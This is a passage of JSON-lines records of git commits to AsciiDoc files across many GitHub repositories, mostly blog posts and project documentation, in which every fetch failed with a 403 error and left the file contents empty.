{"commit":"e4ee209eb8c213292ba2617ad6af8a39a53aab14","subject":"Add GitHub SUPPORT file (#1290)","message":"Add GitHub SUPPORT file (#1290)\n\n","repos":"micrometer-metrics\/micrometer,micrometer-metrics\/micrometer,micrometer-metrics\/micrometer","old_file":"SUPPORT.adoc","new_file":"SUPPORT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/micrometer-metrics\/micrometer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"892fc2e75b16067b72a51386b509ec52ce79a89b","subject":"Update 2019-07-20-Probabilistic-Graphical-Models-Variable-Elimination.adoc","message":"Update 2019-07-20-Probabilistic-Graphical-Models-Variable-Elimination.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-07-20-Probabilistic-Graphical-Models-Variable-Elimination.adoc","new_file":"_posts\/2019-07-20-Probabilistic-Graphical-Models-Variable-Elimination.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"684c4e8d396464c227a0eacb1e2bf66f015ec8a2","subject":"Adding revisions section; refactoring document; revising snippets section","message":"Adding revisions section; refactoring document; revising snippets section\n","repos":"craibuc\/ssms2012,craibuc\/ssms2012","old_file":"sqlcmd.adoc","new_file":"sqlcmd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/craibuc\/ssms2012.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38fc3c9706113d5cfa9d509af0b79fd04d2668dd","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd11012bd282f2b751f281212154a0bdfbb72612","subject":"Update 2018-05-07-study-gas-with-slack.adoc","message":"Update 2018-05-07-study-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-study-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-study-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7695a05999192925f12e222159f1196b1db58013","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/01\/28\/deref.adoc","new_file":"content\/news\/2022\/01\/28\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7f82f94b6186ff8aaf6067b0a96eefef520ce742","subject":"Add clustering doc","message":"Add clustering doc\n","repos":"curso007\/camel,drsquidop\/camel,apache\/camel,adessaigne\/camel,snurmine\/camel,cunningt\/camel,ullgren\/camel,mcollovati\/camel,isavin\/camel,sverkera\/camel,tdiesler\/camel,tadayosi\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,sverkera\/camel,apache\/camel,anoordover\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,objectiser\/camel,drsquidop\/camel,anton-k11\/camel,akhettar\/camel,apache\/camel,dmvolod\/camel,pmoerenhout\/camel,rmarting\/camel,Fabryprog\/camel,davidkarlsen\/camel,isavin\/camel,ullgren\/camel,dmvolod\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,nicolaferraro\/camel,onders86\/camel,isavin\/camel,adessaigne\/camel,Fabryprog\/camel,anoordover\/camel,alvinkwekel\/camel,gautric\/camel,anton-k11\/camel,akhettar\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,adessaigne\/camel,rmarting\/camel,nikhilvibhav\/camel,christophd\/camel,Fabryprog\/camel,gautric\/camel,kevinearls\/camel,CodeSmell\/camel,anton-k11\/camel,tdiesler\/camel,christophd\/camel,tdiesler\/camel,cunningt\/camel,dmvolod\/camel,jamesnetherton\/camel,zregvart\/camel,drsquidop\/camel,anoordover\/camel,tadayosi\/camel,isavin\/camel,DariusX\/camel,cunningt\/camel,mcollovati\/camel,sverkera\/camel,rmarting\/camel,jonmcewen\/camel,jonmcewen\/camel,alvinkwekel\/camel,davidkarlsen\/camel,gnodet\/camel,zregvart\/camel,punkhorn\/camel-upstream,sverkera\/camel,christophd\/camel,snurmine\/camel,jamesnetherton\/camel,christophd\/camel,christophd\/camel,Fabryprog\/camel,kevinearls\/camel,apache\/camel,jonmcewen\/camel,anton-k11\/camel,curso007\/camel,anton-k11\/camel,DariusX\/camel,snurmine\/camel,jamesnetherton\/camel,akhettar\/camel,objectiser\/camel,pax95\/camel,tadayosi\/camel,punkhorn\/camel-upstream,cunningt\/camel,pax95\/camel,snurmine\/camel,anton-k11\/camel,CodeSmell\/camel,isavin\/camel,jonmcewen\/camel,nicolaferraro\/camel,tadayosi\/camel,gnodet\/camel,DariusX\/camel,drsquidop\/camel,sverkera\/camel,curso007\/camel,snurmine\/camel,akhettar\/camel,DariusX\/camel,rmarting\/camel,gautric\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,tdiesler\/camel,drsquidop\/camel,gautric\/camel,tadayosi\/camel,onders86\/camel,kevinearls\/camel,Thopap\/camel,punkhorn\/camel-upstream,zregvart\/camel,davidkarlsen\/camel,onders86\/camel,cunningt\/camel,jonmcewen\/camel,isavin\/camel,gautric\/camel,gnodet\/camel,nicolaferraro\/camel,rmarting\/camel,pax95\/camel,alvinkwekel\/camel,kevinearls\/camel,drsquidop\/camel,jamesnetherton\/camel,curso007\/camel,anoordover\/camel,CodeSmell\/camel,onders86\/camel,CodeSmell\/camel,nicolaferraro\/camel,Thopap\/camel,christophd\/camel,Thopap\/camel,adessaigne\/camel,objectiser\/camel,curso007\/camel,ullgren\/camel,apache\/camel,pax95\/camel,gautric\/camel,cunningt\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pax95\/camel,rmarting\/camel,zregvart\/camel,anoordover\/camel,objectiser\/camel,dmvolod\/camel,adessaigne\/camel,Thopap\/camel,pmoerenhout\/camel,jamesnetherton\/camel,gnodet\/camel,dmvolod\/camel,nikhilvibhav\/camel,mcollovati\/camel,dmvolod\/camel,kevinearls\/camel,pax95\/camel,ullgren\/camel,Thopap\/camel,curso007\/camel,alvinkwekel\/camel,snurmine\/camel,onders86\/camel,pmoerenhout\/camel,kevinearls\/camel,onders86\/camel,akhettar\/camel,mcollovati\/camel,Thopap\/camel,anoordover\/camel,sverkera\/camel,tdiesler\/camel,akhettar\/camel","old_file":"camel-core\/src\/main\/docs\/clustering.adoc","new_file":"camel-core\/src\/main\/docs\/clustering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"176795ce227539cc6c0690524e01e4e5153a2ce9","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bacc18570c08262479db24d7f0041fc5aa77a9c","subject":"Update 2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","message":"Update 2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","new_file":"_posts\/2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e04704284f406d28b3e6c187bac94b02529f8443","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"220c704431b40e7988b2594821ff97812cf9e523","subject":"Update 2017-05-31-My-English-Title.adoc","message":"Update 2017-05-31-My-English-Title.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-My-English-Title.adoc","new_file":"_posts\/2017-05-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"405665e782f87a8ad2916e36efeb25a7aec06bff","subject":"y2b create post Threadless Order Unboxing! Super Tees!","message":"y2b create post Threadless Order Unboxing! Super Tees!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-25-Threadless-Order-Unboxing-Super-Tees.adoc","new_file":"_posts\/2011-03-25-Threadless-Order-Unboxing-Super-Tees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46f7aabab5396ce2f2cd80784851146876f3cf3c","subject":"First draft of parameter syntax CIP","message":"First draft of parameter syntax CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2016-07-07-Parameter-syntax.adoc","new_file":"cip\/CIP2016-07-07-Parameter-syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b72835a54384ece685de3224e6e17c93756fc96","subject":"Fix Typos","message":"Fix Typos","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain","old_file":"src\/docs\/manual\/02_install.adoc","new_file":"src\/docs\/manual\/02_install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4762d981408cba1d58ffaade1c15f5ce39bff051","subject":"Update 2010-06-26-Android-21-tient-la-moitie-du-parc.adoc","message":"Update 2010-06-26-Android-21-tient-la-moitie-du-parc.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-06-26-Android-21-tient-la-moitie-du-parc.adoc","new_file":"_posts\/2010-06-26-Android-21-tient-la-moitie-du-parc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"335b2b3d462564450b47cc02d99dd63227d2b2f6","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aacb28effec26229c7a5b2e75922fb8c682600b0","subject":"y2b create post You've Never Seen A Drone Like This...","message":"y2b create post You've Never Seen A Drone Like This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-01-Youve-Never-Seen-A-Drone-Like-This.adoc","new_file":"_posts\/2016-11-01-Youve-Never-Seen-A-Drone-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36b06a1d117098b127eb0e8753bee2991929eaee","subject":"Publish 2016-1-1-Puzzle-8-Matrix.adoc","message":"Publish 2016-1-1-Puzzle-8-Matrix.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2016-1-1-Puzzle-8-Matrix.adoc","new_file":"2016-1-1-Puzzle-8-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce5c9b8b2c49a79aa14d77f0726c31aaa5f0a281","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b926040364066d07d19ab04c7516186f4bbf762","subject":"Create 2015-09-17-forge-2.19.2.final.asciidoc","message":"Create 2015-09-17-forge-2.19.2.final.asciidoc","repos":"luiz158\/docs,forge\/docs,forge\/docs,luiz158\/docs","old_file":"news\/2015-09-17-forge-2.19.2.final.asciidoc","new_file":"news\/2015-09-17-forge-2.19.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b1479d8acce1d9cdeaeb6eb3a5ed666ef751b4f7","subject":"Update 2015-03-19-The-Kojima-affair.adoc","message":"Update 2015-03-19-The-Kojima-affair.adoc","repos":"filipeuva\/filipeuva.blog,filipeuva\/filipeuva.blog,filipeuva\/filipeuva.blog","old_file":"_posts\/2015-03-19-The-Kojima-affair.adoc","new_file":"_posts\/2015-03-19-The-Kojima-affair.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/filipeuva\/filipeuva.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fed44b3a14dcd21b56774d17be5c6fb691d004d5","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef9682d6aae232fda0432d5b21c8fe237ba36259","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f5d90129dcd6b96824ae84d24f68aa286766ddc","subject":"y2b create post This Tiny Laptop Raised $3.5 Million Dollars...","message":"y2b create post This Tiny Laptop Raised $3.5 Million Dollars...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-30-This-Tiny-Laptop-Raised-35-Million-Dollars.adoc","new_file":"_posts\/2017-08-30-This-Tiny-Laptop-Raised-35-Million-Dollars.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94a2dd7cd7bcfcb9f605ecf556904cf2a941166c","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"412be7218b8a40036511f9154701b8ec8bc257ad","subject":"Update 2015-06-08-My-title2.adoc","message":"Update 2015-06-08-My-title2.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-08-My-title2.adoc","new_file":"_posts\/2015-06-08-My-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"529c1f04cb6004e832c28d7d6dfbd3df0b58d323","subject":"Documentation on AMR RTP in case of DTX","message":"Documentation on AMR RTP in case of DTX\n\nChange-Id: I394f405b441c1eb000759151bd8350d5b3a84a0b\n","repos":"osmocom\/osmo-bts,osmocom\/osmo-bts,osmocom\/osmo-bts","old_file":"doc\/manuals\/abis\/rtp-amr.adoc","new_file":"doc\/manuals\/abis\/rtp-amr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/osmocom\/osmo-bts.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d9327a39f84f144540f1bc97e43b79c4be0ac780","subject":"Update 2017-02-23-online.adoc","message":"Update 2017-02-23-online.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-02-23-online.adoc","new_file":"_posts\/2017-02-23-online.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"725b4c661006d7485e1c5c4cc47cdf19f0938699","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3003853f25d05191696bbf4cd62b8a18510e142","subject":"Reformat useful library","message":"Reformat useful library\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f769397162e21f965d60398d658edc1c695faf00","subject":"y2b create post This Slime Could Be Good For Your Phone...","message":"y2b create post This Slime Could Be Good For Your Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-01-This%20Slime%20Could%20Be%20Good%20For%20Your%20Phone....adoc","new_file":"_posts\/2018-01-01-This%20Slime%20Could%20Be%20Good%20For%20Your%20Phone....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecdeac7d3814ba4785b3ed1ba41aeef7079debdc","subject":"docs: Use a non-SSH method of installing Gerrit commit hook","message":"docs: Use a non-SSH method of installing Gerrit commit hook\n\nApparently, contributors in China cannot connect to the Gerrit SSH port.\nBecause of this, they cannot follow the How to Contribute directions for\ninstalling the Gerrit commit hook.\n\nThis patch updates those instructions to use HTTPS instead of SSH for\ninstalling the Gerrit commit hook, which should work for everyone.\n\nChange-Id: Ibdb024aafcd601f740ae73d83c54f9659cc5a3a9\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11896\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9226db1177131f3a4397e0b1f8b3d8a942e7ec10","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","message":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f046577bb43284a8d41003cc1357f3fdd826ee3b","subject":"New internal design doc","message":"New internal design doc\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/internal_design.adoc","new_file":"userguide\/tutorials\/internal_design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8be4f4583fe630f24844f50c4f2873a665054e02","subject":"Update 2016-11-01-Tis-the-Season-in-Walt-Disney-World.adoc","message":"Update 2016-11-01-Tis-the-Season-in-Walt-Disney-World.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-11-01-Tis-the-Season-in-Walt-Disney-World.adoc","new_file":"_posts\/2016-11-01-Tis-the-Season-in-Walt-Disney-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09d95118e19fee43c2990b2078da7baa6fcc2541","subject":"y2b create post XBOX 360 Wireless Speed Wheel + Forza Motorsport 4 Unboxing","message":"y2b create post XBOX 360 Wireless Speed Wheel + Forza Motorsport 4 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-01-XBOX-360-Wireless-Speed-Wheel--Forza-Motorsport-4-Unboxing.adoc","new_file":"_posts\/2011-12-01-XBOX-360-Wireless-Speed-Wheel--Forza-Motorsport-4-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31610f18f468c77704c6a4feba60ac3b53672ff8","subject":"editorial fixes","message":"editorial fixes\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1376e2cb1244905a98bcc8c6ee8c13bbf3a5117d","subject":"Add new workflow docs","message":"Add new workflow docs\n","repos":"jvalkeal\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-data,cppwfs\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow","old_file":"src\/team\/github-actions-workflows.adoc","new_file":"src\/team\/github-actions-workflows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cppwfs\/spring-cloud-dataflow.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4120914fcc2b3b6e667a3080ab3c16749729de9","subject":"Update 2015-2-10-.adoc","message":"Update 2015-2-10-.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-2-10-.adoc","new_file":"_posts\/2015-2-10-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"366a5eda16ed1fc73d414ffa2fba087b7a073006","subject":"chore(ch4): promise-sequence\u3092\u79fb\u52d5","message":"chore(ch4): 